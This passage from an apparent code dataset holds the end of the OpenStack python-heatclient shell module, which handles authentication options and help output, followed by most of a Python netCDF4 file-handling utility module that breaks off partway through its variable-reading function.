env[OS_PROJECT_NAME]\"))\n\n if not args.os_auth_url:\n raise exc.CommandError(_(\"You must provide an auth url via \"\n \"either --os-auth-url or via \"\n \"env[OS_AUTH_URL]\"))\n kwargs = {\n 'insecure': args.insecure,\n 'cacert': args.os_cacert,\n 'cert': args.os_cert,\n 'key': args.os_key,\n 'timeout': args.api_timeout\n }\n\n service_type = args.os_service_type or 'orchestration'\n if args.os_no_client_auth:\n # Do not use session since no_client_auth means using heat to\n # to authenticate\n kwargs = {\n 'username': args.os_username,\n 'password': args.os_password,\n 'auth_url': args.os_auth_url,\n 'token': args.os_auth_token,\n 'include_pass': args.include_password,\n 'insecure': args.insecure,\n 'timeout': args.api_timeout,\n 'endpoint': args.heat_url\n }\n else:\n keystone_session = self._get_keystone_session(**kwargs)\n endpoint_type = args.os_endpoint_type or 'publicURL'\n if args.os_auth_token:\n kwargs = {\n 'token': args.os_auth_token,\n 'auth_url': args.os_auth_url\n }\n keystone_auth = generic.Token(**kwargs)\n else:\n project_id = args.os_project_id or args.os_tenant_id\n project_name = args.os_project_name or args.os_tenant_name\n kwargs = {\n 'username': args.os_username,\n 'user_id': args.os_user_id,\n 'user_domain_id': args.os_user_domain_id,\n 'user_domain_name': args.os_user_domain_name,\n 'password': args.os_password,\n 'auth_url': args.os_auth_url,\n 'project_id': project_id,\n 'project_name': project_name,\n 'project_domain_id': args.os_project_domain_id,\n 'project_domain_name': args.os_project_domain_name,\n }\n keystone_auth = generic.Password(**kwargs)\n\n kwargs = {\n 'auth_url': args.os_auth_url,\n 'session': keystone_session,\n 'auth': keystone_auth,\n 'service_type': service_type,\n 'endpoint_type': endpoint_type,\n 'region_name': args.os_region_name,\n 'username': args.os_username,\n 'password': args.os_password,\n 'include_pass': args.include_password,\n 'endpoint_override': args.heat_url,\n }\n\n client = heat_client.Client(api_version, **kwargs)\n\n profile = osprofiler_profiler and options.profile\n if profile:\n osprofiler_profiler.init(options.profile)\n\n args.func(client, args)\n\n if profile:\n trace_id = osprofiler_profiler.get().get_base_id()\n print(_(\"Trace ID: 
%s\") % trace_id)\n print(_(\"To display trace use next command:\\n\"\n \"osprofiler trace show --html %s \") % trace_id)\n\n def do_bash_completion(self, args):\n \"\"\"Prints all of the commands and options to stdout.\n\n The heat.bash_completion script doesn't have to hard code them.\n \"\"\"\n commands = set()\n options = set()\n for sc_str, sc in self.subcommands.items():\n commands.add(sc_str)\n for option in list(sc._optionals._option_string_actions):\n options.add(option)\n\n commands.remove('bash-completion')\n commands.remove('bash_completion')\n print(' '.join(commands | options))\n\n @utils.arg('command', metavar='', nargs='?',\n help=_('Display help for .'))\n def do_help(self, args):\n \"\"\"Display help about this program or one of its subcommands.\"\"\"\n if getattr(args, 'command', None):\n if args.command in self.subcommands:\n self.subcommands[args.command].print_help()\n else:\n raise exc.CommandError(\"'%s' is not a valid subcommand\" %\n args.command)\n else:\n self.parser.print_help()\n\n\nclass HelpFormatter(argparse.HelpFormatter):\n def start_section(self, heading):\n # Title-case the headings\n heading = '%s%s' % (heading[0].upper(), heading[1:])\n super(HelpFormatter, self).start_section(heading)\n\n\ndef main(args=None):\n try:\n if args is None:\n args = sys.argv[1:]\n\n HeatShell().main(args)\n except KeyboardInterrupt:\n print(_(\"... terminating heat client\"), file=sys.stderr)\n sys.exit(130)\n except Exception as e:\n if '--debug' in args or '-d' in args:\n raise\n else:\n print(encodeutils.safe_encode(str(e)), file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openstack/python-heatclient","sub_path":"heatclient/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":26084,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"23138636153","text":"\"\"\"\nModule\n------\n\n netcdf4_interface.py\n\nDescription\n-----------\n\n This module contains functions which interface with the Python\n netCDF4 library.\n\nFunctions\n---------\n\n __get_ncapp_path__(ncapp):\n\n This function checks whether the netCDF application path\n requested upon entry exists; if so, the path to the respective\n netCDF application will be defined and returned.\n\n __read_ncdim_obj__(ncdim_obj)\n\n This function parses a specified object containing netCDF\n dimension variable attributes and builds a Python dictionary\n containing key and value pairs defining the a netCDF variable\n dimensions; the designation between specified attributes and\n namespace attributes is made by checking the respective string\n formats.\n\n __read_ncvar_obj__(ncvar_obj)\n\n This function parses a specified object containing netCDF\n variable attributes and builds a Python dictionary containing\n key and value pairs defining the a netCDF variable attribytes;\n the designation between specified attributes and namespace\n attributes is made by checking the respective string formats.\n\n nccheck(ncfile, ncfrmt=None)\n\n This function checks whether a given file path is a\n netCDF-formatted file and returns a boolean valued variable\n specifying such.\n\n ncconcat(ncfilelist, ncfile, ncdim, ncfrmt=None)\n\n This function concatenates a list of netCDF-formatted files,\n provided in `ncfilelist`, into a single file (`ncfile`); the\n concatenation is performed along a single specified dimension\n (`ncdim`); optional arguments enable the format of the\n concatenated file to be specified.\n\n 
nccopy(ncfilein, ncfileout, ncfrmtout, ncfrmtin=None,\n ncvarlist=None, ncunlimval=None, use_nccopy=False):\n\n This function performs a direct copy of an input\n netCDF-formattedfile to a specified output netCDF-formatted\n file of a specified format.\n\n nccopyvar(ncfilein, ncfileout, ncvarname, ncvar, ncout_mode,\n ncfrmtin=None, ncfrmtout=None):\n\n This function performs a direct copy of a specified variable\n from a specified input file to a specified output file.\n\n ncnumvar(ncfile, ncfrmt=None)\n\n This function parses a netCDF-formatted file to determine the\n total number of variable arrays within the respective file.\n\n ncreadattr(ncfile, ncattrname, ncvarname=None, ncfrmt=None):\n\n This function parses a netCDF-formatted file to collect the\n specified netCDF attribute value(s).\n\n ncreaddim(ncfile, ncdimname, ncfrmt=None):\n\n This function parses a netCDF-formatted file to collect and\n return the dimension size for the specified dimension variable\n name.\n\n ncreadvar(ncfile, ncvarname, ncfrmt=None, from_ncgroup=False,\n ncgroupname=None, squeeze=False, axis=None, level=None)\n\n This function parses a netCDF-formatted file in order to\n collect and return the values for the specified variable; this\n function also provides optional capabilities to apply the\n numpy squeeze application to truncate to the specified\n dimensions.\n\n ncvarexist(ncfilein, ncvarname, ncfrmtin=None)\n\n This function reads a netCDF-formatted file and queries the\n variable list for the existence of a specified variable name\n (`ncvarname`); it returns a boolean values indicating whether\n the variable name has been found.\n\n ncvarlist(ncfile, ncfrmt=None):\n\n This function reads and returns a list of variables within the\n netCDF-formatted file specified upon entry.\n\n ncwrite(ncfile, ncdim_obj, ncvar_obj, ncfrmt=None,\n glbattrs_dict=None):\n\n This function writes a netCDF-formatted file, containing the\n specified dimensions, variables, and (optional) attributes.\n\n ncwritevar(ncfile, ncvarname, ncvar, ncfrmt=None)\n\n This function opens a netCDF-formatted file and writes the\n array (`ncvar`) values for the specified variable to the\n respective (open) netCDF-formatted file.\n\nRequirements\n------------\n\n- netcdf-c; https://github.com/Unidata/netcdf-c\n\n- netCDF4-python; https://github.com/Unidata/netcdf4-python\n\nAuthor(s)\n---------\n\n Henry R. 
Winterbottom; 30 November 2022\n\nHistory\n-------\n\n 2022-11-30: Henry Winterbottom -- Initial implementation.\n\n\"\"\"\n\n# ----\n\n# pylint: disable=consider-using-with\n# pylint: disable=no-member\n# pylint: disable=redefined-outer-name\n# pylint: disable=too-many-arguments\n# pylint: disable=too-many-branches\n# pylint: disable=too-many-lines\n# pylint: disable=too-many-locals\n\n# ----\n\nfrom typing import Dict, List, Tuple, Union\n\nimport netCDF4\nimport numpy\nfrom execute import subprocess_interface\nfrom tools import parser_interface, system_interface\nfrom utils.exceptions_interface import NetCDF4InterfaceError\nfrom utils.logger_interface import Logger\n\n# ----\n\n# Define all available module properties.\n__all__ = [\n \"nccheck\",\n \"ncconcat\",\n \"nccopy\",\n \"nccopyvar\",\n \"ncnumvar\",\n \"ncreadattr\",\n \"ncreaddim\",\n \"ncreadvar\",\n \"ncvarexist\",\n \"ncvarlist\",\n \"ncwrite\",\n \"ncwritevar\",\n]\n\n# ----\n\nlogger = Logger(caller_name=__name__)\n\n# ----\n\n\ndef __get_ncapp_path__(ncapp: str) -> str:\n \"\"\"\n Description\n -----------\n\n This function checks whether the netCDF application path requested\n upon entry exists; if so, the path to the respective netCDF\n application will be defined and returned.\n\n Parameters\n ----------\n\n ncapp: ``str``\n\n A Python string specifying the name of the netCDF application.\n\n Returns\n -------\n\n ncapp_path: ``str``\n\n A Python string specifying the path to the netCDF application\n specified upon entry.\n\n Raises\n ------\n\n NetCDF4InterfaceError:\n\n - raised if the netCDF application path cannot be determined.\n\n \"\"\"\n\n # Check the run-time environment in order to determine the netCDF\n # application path; proceed accordingly.\n ncapp_path = system_interface.get_app_path(app=f\"{ncapp}\")\n if ncapp_path is None:\n msg = (\n f\"The path for the netCDF application {ncapp} could not be \"\n \"determined for your system; please check that the appropriate \"\n \"libraries/modules are loaded prior to calling this script. 
\"\n \"Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n return ncapp_path\n\n\n# ----\n\n\ndef __read_ncdim_obj__(ncdim_obj: object) -> Dict:\n \"\"\"\n Description\n -----------\n\n This function parses a specified object containing netCDF\n dimension variable attributes and builds a Python dictionary\n containing key and value pairs defining the a netCDF variable\n dimensions; the designation between specified attributes and\n namespace attributes is made by checking the respective string\n formats.\n\n Parameters\n ----------\n\n ncdim_obj: ``object``\n\n A user specified Python object containing(a) netCDF dimension\n attribute(s).\n\n Returns\n -------\n\n ncdim_dict: ``Dict``\n\n A Python dictionary containing the user-specified netCDF\n variable dimension attributes.\n\n \"\"\"\n\n # Collect the netCDF dimension attributes.\n ncdim_dict = {}\n keys = vars(ncdim_obj)\n for key in keys:\n value = parser_interface.object_getattr(object_in=ncdim_obj, key=key)\n ncdim_dict[key] = value\n\n return ncdim_dict\n\n\n# ----\n\n\ndef __read_ncvar_obj__(ncvar_obj: object) -> Dict:\n \"\"\"\n Description\n -----------\n\n This function parses a specified object containing netCDF variable\n attributes and builds a Python dictionary containing key and value\n pairs defining the a netCDF variable attribytes; the designation\n between specified attributes and namespace attributes is made by\n checking the respective string formats.\n\n Parameters\n ----------\n\n ncvar_obj: ``object``\n\n A user specified Python object containing the netCDF variable\n attribute(s).\n\n Returns\n -------\n\n ncvar_dict: ``Dict``\n\n A Python dictionary containing the user-specified netCDF\n variable attributes.\n\n \"\"\"\n\n # Collect the netCDF variable attributes.\n ncvar_dict = {}\n keys = vars(ncvar_obj)\n for key in keys:\n value = parser_interface.object_getattr(object_in=ncvar_obj, key=key)\n ncvar_dict[key] = value\n\n return ncvar_dict\n\n\n# ----\n\n\ndef nccheck(ncfile: str, ncfrmt: str = None) -> bool:\n \"\"\"\n Description\n -----------\n\n This function checks whether a given file path is a\n netCDF-formatted file and returns a boolean valued variable\n specifying such.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file(to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n is_ncfile: ``bool``\n\n A Python boolean valued variable specifying whether the\n specified input file is a netCDF-formatted file.\n\n \"\"\"\n\n # Check whether the specified file path is a valid\n # netCDF-formatted file and proceed accordingly.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n try:\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n is_ncfile = True\n except OSError:\n is_ncfile = False\n\n return is_ncfile\n\n\n# ----\n\n\ndef ncconcat(ncfilelist: List, ncfile: str, ncdim: str, ncfrmt: str = None) -> None:\n \"\"\"\n Description\n -----------\n\n This function concatenates a list of netCDF-formatted files,\n provided in `ncfilelist`, into a single file (`ncfile`); the\n concatenation is performed along a single specified dimension\n (`ncdim`); optional arguments enable the format of the\n concatenated file to be specified.\n\n 
Parameters\n ----------\n\n ncfilelist: ``List``\n\n A Python string containing the list of netCDF files to be\n concatenated.\n\n ncfile: ``str``\n\n A Python string specifying the netCDF file(to be created)\n containing the concatenated values collected from each of the\n files to be concatenated.\n\n ncdim: ``str``\n\n A Python string specifying the netCDF variable dimension along\n which to concatenated the respective netCDF files list.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF file\n containing the concatenated values collected from each of the\n files to be concatenated; available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n \"\"\"\n\n # Open the destination netCDF-formatted file and read each\n # variable dimension from the respective source files and\n # define the total array dimension along which the source\n # netCDF-formatted files are to be concatenated.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncdimsum = 0\n dstfile = netCDF4.Dataset(filename=ncfile, mode=\"w\", format=ncfrmt)\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n for name, dimension in srcfile.dimensions.items():\n if name == ncdim:\n ncdimsum = ncdimsum + len(dimension)\n srcfile.close()\n\n # Define the total dimension size for the destination\n # netCDF-formatted file arrays.\n srcfile = netCDF4.Dataset(filename=ncfilelist[0], mode=\"r\")\n for name, dimension in srcfile.dimensions.items():\n if name == ncdim:\n dimsize = ncdimsum\n else:\n dimsize = len(dimension) if not dimension.isunlimited() else None\n dstfile.createDimension(name, dimsize)\n\n # Check whether the respective source netCDF-formatted files\n # contain groups; proceed accordingly.\n if len(list(srcfile.groups.keys())) > 0:\n # Collect and define the destination netCDF-formatted file\n # attributes.\n for group in srcfile.groups.keys():\n dstfile.createGroup(group)\n dstfile[group].setncatts(srcfile[group].__dict__)\n for name, variable in srcfile[group].variables.items():\n dstfile[group].createVariable(\n name, variable.datatype, variable.dimensions\n )\n\n # Concatenate the variables along the specified axis (i.e.,\n # dimension) and write the results to the destination\n # netCDF-formatted file.\n ncdimsum = 0\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n ncdimval = len(srcfile.dimensions[ncdim])\n start = ncdimsum\n stop = start + ncdimval\n for group in srcfile.groups.keys():\n for name, variable in srcfile[group].variables.items():\n if ncdim in variable.dimensions:\n dstfile[group][name][start:stop] = srcfile[group][name][:]\n ncdimsum = stop\n srcfile.close()\n else:\n # Collect and define the destination netCDF-formatted file\n # attributes.\n for name, variable in srcfile.variables.items():\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile.setncatts(srcfile.__dict__)\n\n # Concatenate the variables along the specified axis (i.e.,\n # dimension) and write the results to the destination\n # netCDF-formatted file.\n ncdimsum = 0\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n ncdimval = len(srcfile.dimensions[ncdim])\n start = ncdimsum\n stop = start + ncdimval\n for name, variable in srcfile.variables.items():\n if ncdim in variable.dimensions:\n dstfile[name][start:stop] = srcfile[name][:]\n ncdimsum = stop\n 
srcfile.close()\n\n # Close the respective netCDF formatted files.\n dstfile.close()\n\n\n# ----\n\n\ndef nccopy(\n ncfilein: str,\n ncfileout: str,\n ncfrmtout: str,\n ncfrmtin: str = None,\n ncvarlist: List = None,\n ncunlimval: int = None,\n use_nccopy: bool = False,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function performs a direct copy of an input\n netCDF-formattedfile to a specified output netCDF-formatted file\n of a specified format.\n\n Parameters\n ----------\n\n ncfilein: ``str``\n\n A Python string specifying the input netCDF-formatted file to\n be copied.\n\n ncfileout: ``str``\n\n A Python string specifying the netCDF file(to be created)\n containing the contents of the input netCDF file.\n\n ncfrmtout: ``str``\n\n A Python string specifying the format of the netCDF file to be\n created; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n Keywords\n --------\n\n ncfrmtin: ``str``, optional\n\n A Python string specifying the format of the input\n netCDF-formatted file; available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n ncvarlist: ``List``, optional\n\n A Python list of variable name strings; if NoneType, the\n variables within the list will be the only variables written\n to the destination netCDF-formatted file.\n\n ncunlimval: ``int``, optional\n\n A Python integer value specifying the unlimited dimension\n size; if NoneType, the dimension size will be 0.\n\n use_nccopy: ``bool``, optional\n\n A Python boolean valued variable specifying whether to use the\n netCDF nccopy utility to produce a direct copy of the\n netCDF-formatted file specified upon entry.\n\n Raises\n ------\n\n NetCDF4InterfaceError:\n\n - raised if the netCDF nccopy application output file form is\n not supported.\n\n \"\"\"\n\n # Use the netCDF applications on the local platform to produce a\n # copy of the netCDF-formatted file provided upon entry; this\n # should be used in instances of netCDF-formatted files containing\n # hierarchial groups.\n if use_nccopy:\n # Define the nccopy application for the local platform.\n nccopy_app = __get_ncapp_path__(ncapp=\"nccopy\")\n\n # Define the argument string corresponding to the format of\n # the copied netCDF-formatted file; proceed accordingly.\n ncfrmtout_dict = {\n \"NETCDF4\": \"4\",\n \"NETCDF4_CLASSIC\": \"4\",\n \"NETCDF3_CLASSIC\": \"3\",\n \"NETCDF3_64BIT_OFFSET\": \"2\",\n \"NETCDF3_64BIT_DATA\": \"6\",\n }\n nccopy_app_str = parser_interface.dict_key_value(\n dict_in=ncfrmtout_dict, key=ncfrmtout, force=True, no_split=True\n )\n if nccopy_app_str is None:\n msg = (\n \"The netCDF nccopy application output file formatted \"\n f\"type {ncfrmtout} is not supported. 
Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Create a direct copy of the netCDF-formatted file provided\n # upon entry.\n msg = (\n f\"Creating a direct copy of netCDF-formatted file path {ncfilein} \"\n f\"as {ncfileout} and format {ncfrmtout.upper()}.\"\n )\n logger.info(msg=msg)\n cmd = [f\"-{nccopy_app_str}\", f\"{ncfilein}\", f\"{ncfileout}\"]\n subprocess_interface.run(exe=nccopy_app, job_type=\"app\", args=cmd)\n\n # Create a direct copy of the netCDF formatted file provided upon\n # entry using the Python netCDF4 library attributes.\n if not use_nccopy:\n # Initialize the source and destination netCDF-formatted\n # files.\n if ncfrmtin is None:\n ncfrmtin = \"NETCDF4_CLASSIC\"\n srcfile = netCDF4.Dataset(ncfilein, \"r\", format=ncfrmtin)\n dstfile = netCDF4.Dataset(ncfileout, \"w\", format=ncfrmtout)\n\n # Loop through each variable and dimension and define the\n # array dimensions for the destination netCDF-formatted file.\n for name, dimension in srcfile.dimensions.items():\n if ncunlimval is None:\n dimsize = len(dimension) if not dimension.isunlimited() else None\n if ncunlimval is not None:\n dimsize = len(dimension) if not dimension.isunlimited() else ncunlimval\n dstfile.createDimension(name, dimsize)\n\n # Determine the netCDF variables to be copied and proceed\n # accordingly.\n if ncvarlist is None:\n for name, variable in srcfile.variables.items():\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name][:] = srcfile[name][:]\n dstfile[name].setncatts(srcfile[name].__dict__)\n if ncvarlist is not None:\n for name, variable in srcfile.variables.items():\n if name in ncvarlist:\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name][:] = srcfile[name][:]\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile.setncatts(srcfile.__dict__)\n\n # Close the open source and destination netCDF-formatted\n # files.\n dstfile.close()\n srcfile.close()\n\n\n# ----\n\n\ndef nccopyvar(\n ncfilein: str,\n ncfileout: str,\n ncvarname: str,\n ncvar: numpy.array,\n ncout_mode: str,\n ncfrmtin: str = None,\n ncfrmtout: str = None,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function performs a direct copy of a specified variable from\n a specified input file to a specified output file.\n\n Parameters\n ----------\n\n ncfilein: ``str``\n\n A Python string specifying the input(source) netCDF-formatted\n file.\n\n ncfileout: ``str``\n\n A Python string specifying the output(destination)\n netCDF-formatted file.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be copied.\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the respective netCDF\n variable.\n\n ncout_mode: ``str``\n\n A Python string specifying the write-mode for the output\n netCDF-formatted file; this should typically be either 'w' for\n a new netCDF-formatted file write(this will clobber any\n previous existence of ncfileout) or 'a' to append to an\n existing netCDF-formatted file.\n\n Keywords\n --------\n\n ncfrmtin: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n input file; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n ncfrmtout: ``str``, optional\n\n A Python string specifying the format of the netCDF file to be\n written to; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n \"\"\"\n\n # Initialize the 
source and destination netCDF-formatted file.\n if ncfrmtin is None:\n ncfrmtin = \"NETCDF4_CLASSIC\"\n if ncfrmtout is None:\n ncfrmtout = \"NETCDF4_CLASSIC\"\n srcfile = netCDF4.Dataset(filename=ncfilein, mode=\"r\", format=ncfrmtin)\n dstfile = netCDF4.Dataset(filename=ncfileout, mode=ncout_mode, format=ncfrmtout)\n\n # Loop through each variable within the netCDF-formatted file and\n # copy the specified variables to the destination netCDF-formatted\n # file.\n for name, variable in srcfile.variables.items():\n if ncvarname == name:\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile[name][:] = ncvar\n\n # Close the open source and destination netCDF-formatted files.\n dstfile.close()\n srcfile.close()\n\n\n# ----\n\n\ndef ncnumvar(ncfile: str, ncfrmt: str = None) -> int:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to determine the\n total number of variable arrays within the respective file.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n numvar: ``int``\n\n A Python integer specifying the total number of variable\n arrays within the respective netCDF-formatted input file.\n\n \"\"\"\n\n # Open the netCDF-formatted file and proceed accordingly.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n numvar = len(ncfile.variables)\n\n # Close the open netCDF-formatted file and return the netCDF\n # variable array.\n ncfile.close()\n\n return numvar\n\n\n# ----\n\n\ndef ncreadattr(\n ncfile: str, ncattrname: str, ncvarname: str = None, ncfrmt: str = None\n) -> Union[str, float, int, Tuple]:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to collect the\n specified netCDF attribute value(s)\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncattrname: ``str``\n\n A Python string specifying the netCDF attribute to collect and\n return.\n\n Keywords\n --------\n\n ncvarname: ``str``, optional\n\n A Python string specifying the netCDF variable from which to\n retrieve the specified netCDF attribute; a value of NoneType\n implies a global attribute is to be retrieved.\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncattr: ``Union[str, float, int, Tuple]``\n\n A Python type containing the value(s) for the specified netCDF\n attribute.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the netCDF attributes accordingly.\n if ncvarname is None:\n ncattr = parser_interface.object_getattr(\n object_in=ncfile, key=ncattrname, force=True\n )\n if ncvarname is not None:\n ncvar = ncfile.variables[ncvarname]\n ncattr = 
parser_interface.object_getattr(\n object_in=ncvar, key=ncattrname, force=True\n )\n\n # Close the open netCDF-formatted file and return the netCDF\n # attribute.\n ncfile.close()\n\n return ncattr\n\n\n# ----\n\n\ndef ncreaddim(ncfile: str, ncdimname: str, ncfrmt: str = None) -> int:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to collect and return\n the dimension size for the specified dimension variable name.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncdimname: ``str``\n\n A Python string specifying the netCDF dimension to be\n retrieved and returned.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncdim: ``int``\n\n A Python integer specifying the value for the specified\n dimension variable.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the netCDF dimensions accordingly.\n try:\n ncdim = len(\n parser_interface.dict_key_value(\n dict_in=ncfile.dimensions, key=ncdimname, no_split=True\n )\n )\n except KeyError:\n ncdim = None\n\n # Close the open netCDF-formatted file and return the netCDF\n # dimension.\n ncfile.close()\n\n return ncdim\n\n\n# ----\n\n\ndef ncreadvar(\n ncfile: str,\n ncvarname: str,\n ncfrmt: str = None,\n from_ncgroup: bool = False,\n ncgroupname: str = None,\n squeeze: bool = False,\n axis: int = None,\n level: int = None,\n) -> numpy.array:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file in order to collect\n and return the values for the specified variable; this function\n also provides optional capabilities to apply the numpy squeeze\n application to truncate to the specified dimensions.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be retrieved\n and returned.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n from_ncgroup: ``bool``, optional\n\n A Python boolean variable specifying whether the respective\n netCDF variable is contained within a netCDF group/container;\n if True, the parameter ncgroupname must be specified (see\n below).\n\n ncgroupname: ``str``, optional\n\n A Python string specifying the netCDF group/container name;\n used only if from_ncgroup is True upon entry.\n\n squeeze: ``bool``, optional\n\n A Python boolean variable specifying whether to apply the\n numpy squeeze application to truncate the specified variable\n dimension(axis; see below); if True, the variable axis(below)\n must be specified.\n\n axis: ``int``, optional\n\n A Python integer value specifying the variable axis to be\n truncated via the numpy squeeze application.\n\n level: ``int``, optional\n\n A Python integer value specifying the variable level to be\n collected and returned.\n\n Returns\n 
-------\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the respective\n specified netCDF variable.\n\n Raises\n ------\n\n NetCDF4InterfaceError:\n\n - raised if the squeeze attribute is implement without\n specifying the variable axis along which to apply the\n squeeze function.\n\n - raised if the netCDF group/container name is not specified\n when from_ncgroup is True upon entry.\n\n - raised if the netCDF group name specified upon entry cannot\n be determined from the contents or the netCDF-formatted file\n specified upon entry.\n\n \"\"\"\n\n # Check the function parameters.\n if squeeze:\n if axis is None:\n msg = (\n \"If implementing the squeeze attribute, the \"\n \"axis about which to squeeze the ingested variable \"\n \"must be specified. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Open the netCDF-formatted files.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Check whether to read the netCDF variable from a group\n # container; proceed accordingly.\n if from_ncgroup:\n # Check the parameter values provided upon entry and proceed\n # accordingly.\n if ncgroupname is None:\n msg = (\n \"The netCDF group name attribute ncgroupname cannot be \"\n \"NoneType upon entry if attempting to read a netCDF \"\n \"variable from a netCDF group container. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Define the netCDF groups contained within the\n # netCDF-formatted file provided upon entry.\n ncgroups = parser_interface.dict_key_value(\n dict_in=ncfile.groups, key=ncgroupname, force=True, no_split=True\n )\n if ncgroups is None:\n msg = (\n f\"The netCDF group {ncgroupname} could not be determined from the \"\n f\"contents of netCDF-formatted file {ncfile}. 
